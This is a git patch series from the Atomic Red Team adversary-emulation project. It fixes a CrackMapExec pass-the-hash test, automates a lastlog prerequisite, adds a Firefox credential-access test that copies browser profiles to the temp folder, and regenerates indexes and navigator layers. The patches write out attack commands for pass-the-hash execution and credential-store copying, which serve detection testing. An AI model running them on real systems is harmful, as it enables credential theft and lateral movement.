From be5895136114fe0ad502b3f690b8a333ed296e4d Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 31 Jan 2022 17:51:40 +0100 Subject: [PATCH 01/11] T1550.002 fix test 2 (#1747) * fix test 2 * fix crackmapexec --- atomics/T1550.002/T1550.002.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/T1550.002/T1550.002.yaml b/atomics/T1550.002/T1550.002.yaml index 8df1f003..6cafb023 100644 --- a/atomics/T1550.002/T1550.002.yaml +++ b/atomics/T1550.002/T1550.002.yaml @@ -75,10 +75,10 @@ atomic_tests: - description: | CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) prereq_command: | - if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 } + if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1} get_prereq_command: | Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe} executor: command: | - crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command} + #{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command} name: command_prompt From d2fe61bf557b5092277260567d960b1986f779c7 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 31 Jan 2022 16:52:15 +0000 Subject: [PATCH 02/11] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 12 ++++-------- atomics/T1550.002/T1550.002.md | 4 ++-- 2 files changed, 6 insertions(+), 10 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index b258f7bb..1aa60e72 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -33017,7 +33017,7 @@ defense-evasion: (#{crackmapexec_exe}) ' - prereq_command: 'if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 } + prereq_command: 'if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1} ' get_prereq_command: 'Write-Host Automated installer not implemented yet, please @@ -33025,9 +33025,7 @@ defense-evasion: ' executor: - command: 'crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command} - -' + command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n" name: command_prompt T1550.003: technique: @@ -66466,7 +66464,7 @@ lateral-movement: (#{crackmapexec_exe}) ' - prereq_command: 'if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 } + prereq_command: 'if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1} ' get_prereq_command: 'Write-Host Automated installer not implemented yet, please @@ -66474,9 +66472,7 @@ lateral-movement: ' executor: - command: 'crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command} - -' + command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n" name: command_prompt T1550.003: technique: diff --git a/atomics/T1550.002/T1550.002.md b/atomics/T1550.002/T1550.002.md index a3e6ce90..5265a8f9 100644 --- a/atomics/T1550.002/T1550.002.md +++ b/atomics/T1550.002/T1550.002.md @@ -96,7 +96,7 @@ command execute with crackmapexec ```cmd -crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command} +#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command} ``` @@ -106,7 +106,7 @@ crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command} ##### Description: CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) ##### Check Prereq Commands: ```powershell -if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 } +if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell From 58615ef861f2261370a49b04de8c86ad8218a22d Mon Sep 17 00:00:00 2001 From: Leo Verlod <96517806+Leomon5@users.noreply.github.com> Date: Mon, 31 Jan 2022 10:55:54 -0600 Subject: [PATCH 03/11] Automating getprereqs and fixing prereq errors for T1087.001 Test 5 (#1749) * Automating getprereqs and fixing prereq errors for T1087.001 Test 5 Updating T1087.001 Test 5 to automatically install the login package that contains lastlog, as well as resolving an issue with its prereqs that results in an unexpected eof error. * add original guid back in Co-authored-by: Carrie Roberts --- atomics/T1087.001/T1087.001.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/T1087.001/T1087.001.yaml b/atomics/T1087.001/T1087.001.yaml index 4137c784..cd7b0c60 100644 --- a/atomics/T1087.001/T1087.001.yaml +++ b/atomics/T1087.001/T1087.001.yaml @@ -85,9 +85,9 @@ atomic_tests: - description: | Check if lastlog command exists on the machine prereq_command: | - if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; + if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; fi get_prereq_command: | - echo "Install lastlog on the machine to run the test."; exit 1; + sudo apt-get install login; exit 1; executor: command: | lastlog > #{output_file} From 87b786fc7e43055a3449afbf0e009683247f1258 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 31 Jan 2022 16:56:12 +0000 Subject: [PATCH 04/11] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 5 ++--- atomics/T1087.001/T1087.001.md | 4 ++-- 2 files changed, 4 insertions(+), 5 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 1aa60e72..ba6e7972 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -54761,11 +54761,10 @@ discovery: ' prereq_command: 'if [ -x "$(command -v lastlog)" ]; then exit 0; else exit - 1; + 1; fi ' - get_prereq_command: 'echo "Install lastlog on the machine to run the test."; - exit 1; + get_prereq_command: 'sudo apt-get install login; exit 1; ' executor: diff --git a/atomics/T1087.001/T1087.001.md b/atomics/T1087.001/T1087.001.md index 5531cd49..64a58541 100644 --- a/atomics/T1087.001/T1087.001.md +++ b/atomics/T1087.001/T1087.001.md @@ -208,11 +208,11 @@ rm -f #{output_file} ##### Description: Check if lastlog command exists on the machine ##### Check Prereq Commands: ```sh -if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; +if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; fi ``` ##### Get Prereq Commands: ```sh -echo "Install lastlog on the machine to run the test."; exit 1; +sudo apt-get install login; exit 1; ``` From 4843c6212a4e0cb9f0299d47136a293826899382 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 31 Jan 2022 20:14:24 +0100 Subject: [PATCH 05/11] Add firefox profile (#1750) --- atomics/T1555.003/T1555.003.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) diff --git a/atomics/T1555.003/T1555.003.yaml b/atomics/T1555.003/T1555.003.yaml index 80ab3849..d44f77d3 100644 --- a/atomics/T1555.003/T1555.003.yaml +++ b/atomics/T1555.003/T1555.003.yaml @@ -131,3 +131,34 @@ atomic_tests: Copy-Item "$env:APPDATA\Opera Software\Opera Stable\Login Data" -Destination $env:temp cleanup_command: | Remove-Item -Path "$env:temp\Login Data" -Force -ErrorAction Ignore +- name: Simulating access to Windows Firefox Login Data + description: | + Simulates an adversary accessing encrypted credentials from firefox web browser's login database. + more info in https://support.mozilla.org/en-US/kb/profiles-where-firefox-stores-user-data + supported_platforms: + - windows + dependency_executor_name: powershell + dependencies: + - description: | + Firefox must be installed + prereq_command: 'if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit 0} else {exit 1}' + get_prereq_command: | + if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$url="https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-US"}else {$url="https://download.mozilla.org/?product=firefox-latest-ssl&os=win&lang=en-US"} + $installer = "$env:temp\firefoxsetup.exe" + (New-Object Net.WebClient).DownloadFile($url,$installer) + Start-Process $installer -ArgumentList '/S' -Wait + - description: | + Firefox login data file must exist + prereq_command: 'if (Test-Path "$env:APPDATA\Mozilla\Firefox\Profiles\") {exit 0} else {exit 1}' + get_prereq_command: | + if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$firefox="C:\Program Files\Mozilla Firefox\firefox.exe"}else {$firefox="C:\Program Files (x86)\Mozilla Firefox\firefox.exe"} + Start-Process $firefox -ArgumentList '-CreateProfile Atomic' -Wait + Start-Process $firefox -NoNewWindow + Start-Sleep -s 20 + Stop-Process -Name firefox + executor: + name: powershell + command: | + Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination $env:temp -Force + cleanup_command: | + Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction Ig \ No newline at end of file From 152d4e592638690ba740214e35bae94aa9b0a887 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Mon, 31 Jan 2022 19:14:44 +0000 Subject: [PATCH 06/11] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1555.003/T1555.003.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1555.003/T1555.003.yaml b/atomics/T1555.003/T1555.003.yaml index d44f77d3..0c283b08 100644 --- a/atomics/T1555.003/T1555.003.yaml +++ b/atomics/T1555.003/T1555.003.yaml @@ -132,6 +132,7 @@ atomic_tests: cleanup_command: | Remove-Item -Path "$env:temp\Login Data" -Force -ErrorAction Ignore - name: Simulating access to Windows Firefox Login Data + auto_generated_guid: eb8da98a-2e16-4551-b3dd-83de49baa14c description: | Simulates an adversary accessing encrypted credentials from firefox web browser's login database. more info in https://support.mozilla.org/en-US/kb/profiles-where-firefox-stores-user-data diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index a554610f..7aff52be 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -849,3 +849,4 @@ f7d43d35-d628-4582-bb03-01b1c5e10d11 c510d25b-1667-467d-8331-a56d3e9bc4ff deecd55f-afe0-4a62-9fba-4d1ba2deb321 d239772b-88e2-4a2e-8473-897503401bcc +eb8da98a-2e16-4551-b3dd-83de49baa14c From 6190062a52c0a091d21ae4fb79c2497db20bfe63 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 31 Jan 2022 19:14:49 +0000 Subject: [PATCH 07/11] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 39 ++++++++++++ atomics/T1555.003/T1555.003.md | 63 +++++++++++++++++++ 6 files changed, 106 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 18df7028..7763acf2 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -25,6 +25,7 @@ credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt credential-access,T1555.003,Credentials from Web Browsers,4,Simulating access to Chrome Login Data,3d111226-d09a-4911-8715-fe11664f960d,powershell credential-access,T1555.003,Credentials from Web Browsers,5,Simulating access to Opera Login Data,28498c17-57e4-495a-b0be-cc1e36de408b,powershell +credential-access,T1555.003,Credentials from Web Browsers,6,Simulating access to Windows Firefox Login Data,eb8da98a-2e16-4551-b3dd-83de49baa14c,powershell credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt credential-access,T1003.006,DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 96bc1346..0c26c68d 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -12,6 +12,7 @@ credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt credential-access,T1555.003,Credentials from Web Browsers,4,Simulating access to Chrome Login Data,3d111226-d09a-4911-8715-fe11664f960d,powershell credential-access,T1555.003,Credentials from Web Browsers,5,Simulating access to Opera Login Data,28498c17-57e4-495a-b0be-cc1e36de408b,powershell +credential-access,T1555.003,Credentials from Web Browsers,6,Simulating access to Windows Firefox Login Data,eb8da98a-2e16-4551-b3dd-83de49baa14c,powershell credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt credential-access,T1003.006,DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 4c613ce2..f802d2c4 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -39,6 +39,7 @@ - Atomic Test #3: LaZagne - Credentials from Browser [windows] - Atomic Test #4: Simulating access to Chrome Login Data [windows] - Atomic Test #5: Simulating access to Opera Login Data [windows] + - Atomic Test #6: Simulating access to Windows Firefox Login Data [windows] - [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md) - Atomic Test #1: Enumeration for Credentials in Registry [windows] - Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 7bc03dd7..21c0c29d 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -22,6 +22,7 @@ - Atomic Test #3: LaZagne - Credentials from Browser [windows] - Atomic Test #4: Simulating access to Chrome Login Data [windows] - Atomic Test #5: Simulating access to Opera Login Data [windows] + - Atomic Test #6: Simulating access to Windows Firefox Login Data [windows] - [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md) - Atomic Test #1: Enumeration for Credentials in Registry [windows] - Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index ba6e7972..b54288eb 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -1524,6 +1524,45 @@ credential-access: Ignore ' + - name: Simulating access to Windows Firefox Login Data + auto_generated_guid: eb8da98a-2e16-4551-b3dd-83de49baa14c + description: | + Simulates an adversary accessing encrypted credentials from firefox web browser's login database. + more info in https://support.mozilla.org/en-US/kb/profiles-where-firefox-stores-user-data + supported_platforms: + - windows + dependency_executor_name: powershell + dependencies: + - description: 'Firefox must be installed + +' + prereq_command: if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") + -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit + 0} else {exit 1} + get_prereq_command: | + if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$url="https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-US"}else {$url="https://download.mozilla.org/?product=firefox-latest-ssl&os=win&lang=en-US"} + $installer = "$env:temp\firefoxsetup.exe" + (New-Object Net.WebClient).DownloadFile($url,$installer) + Start-Process $installer -ArgumentList '/S' -Wait + - description: 'Firefox login data file must exist + +' + prereq_command: if (Test-Path "$env:APPDATA\Mozilla\Firefox\Profiles\") {exit + 0} else {exit 1} + get_prereq_command: | + if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$firefox="C:\Program Files\Mozilla Firefox\firefox.exe"}else {$firefox="C:\Program Files (x86)\Mozilla Firefox\firefox.exe"} + Start-Process $firefox -ArgumentList '-CreateProfile Atomic' -Wait + Start-Process $firefox -NoNewWindow + Start-Sleep -s 20 + Stop-Process -Name firefox + executor: + name: powershell + command: 'Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination + $env:temp -Force + +' + cleanup_command: Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction + Ig T1552.002: technique: created: '2020-02-04T12:58:40.678Z' diff --git a/atomics/T1555.003/T1555.003.md b/atomics/T1555.003/T1555.003.md index 5dcb672b..883e3de8 100644 --- a/atomics/T1555.003/T1555.003.md +++ b/atomics/T1555.003/T1555.003.md @@ -22,6 +22,8 @@ After acquiring credentials from web browsers, adversaries may attempt to recycl - [Atomic Test #5 - Simulating access to Opera Login Data](#atomic-test-5---simulating-access-to-opera-login-data) +- [Atomic Test #6 - Simulating access to Windows Firefox Login Data](#atomic-test-6---simulating-access-to-windows-firefox-login-data) +
@@ -269,4 +271,65 @@ New-Item -Path "$env:APPDATA\Opera Software\Opera Stable\Login Data" -ItemType F +
+
+ +## Atomic Test #6 - Simulating access to Windows Firefox Login Data +Simulates an adversary accessing encrypted credentials from firefox web browser's login database. +more info in https://support.mozilla.org/en-US/kb/profiles-where-firefox-stores-user-data + +**Supported Platforms:** Windows + + +**auto_generated_guid:** eb8da98a-2e16-4551-b3dd-83de49baa14c + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination $env:temp -Force +``` + +#### Cleanup Commands: +```powershell +Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction Ig +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: Firefox must be installed +##### Check Prereq Commands: +```powershell +if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$url="https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-US"}else {$url="https://download.mozilla.org/?product=firefox-latest-ssl&os=win&lang=en-US"} +$installer = "$env:temp\firefoxsetup.exe" +(New-Object Net.WebClient).DownloadFile($url,$installer) +Start-Process $installer -ArgumentList '/S' -Wait +``` +##### Description: Firefox login data file must exist +##### Check Prereq Commands: +```powershell +if (Test-Path "$env:APPDATA\Mozilla\Firefox\Profiles\") {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$firefox="C:\Program Files\Mozilla Firefox\firefox.exe"}else {$firefox="C:\Program Files (x86)\Mozilla Firefox\firefox.exe"} +Start-Process $firefox -ArgumentList '-CreateProfile Atomic' -Wait +Start-Process $firefox -NoNewWindow +Start-Sleep -s 20 +Stop-Process -Name firefox +``` + + + +
From 355d170d6210cb53bfa1206056618e3e5d3222eb Mon Sep 17 00:00:00 2001 From: Jose Enrique Hernandez Date: Mon, 31 Jan 2022 15:32:50 -0500 Subject: [PATCH 08/11] added link object, removed comments (#1751) --- .../art-navigator-layer-azure-ad.json | 2 +- .../art-navigator-layer-containers.json | 2 +- .../art-navigator-layer-google-workspace.json | 2 +- .../art-navigator-layer-iaas.json | 2 +- .../art-navigator-layer-linux.json | 2 +- .../art-navigator-layer-macos.json | 2 +- .../art-navigator-layer-office-365.json | 2 +- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/index.yaml | 4140 ++++++++--------- bin/generate-atomic-docs.rb | 7 +- 11 files changed, 2084 insertions(+), 2081 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json index 42bd9992..0ccf8d24 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json @@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (Azure-AD)","description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1484.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"},{"techniqueID":"T1484","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"},{"techniqueID":"T1606.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"},{"techniqueID":"T1606","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]} \ No newline at end of file +{"version":"4.3","name":"Atomic Red Team (Azure-AD)","description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json index b0e46e00..69180529 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json @@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (Containers)","description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file +{"version":"4.3","name":"Atomic Red Team (Containers)","description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1053.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1552.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json index 5cbdb87f..5d57adec 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json @@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (Google-Workspace)","description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1078.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]} \ No newline at end of file +{"version":"4.3","name":"Atomic Red Team (Google-Workspace)","description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json index 9256138e..42be7106 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json @@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (Iaas)","description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 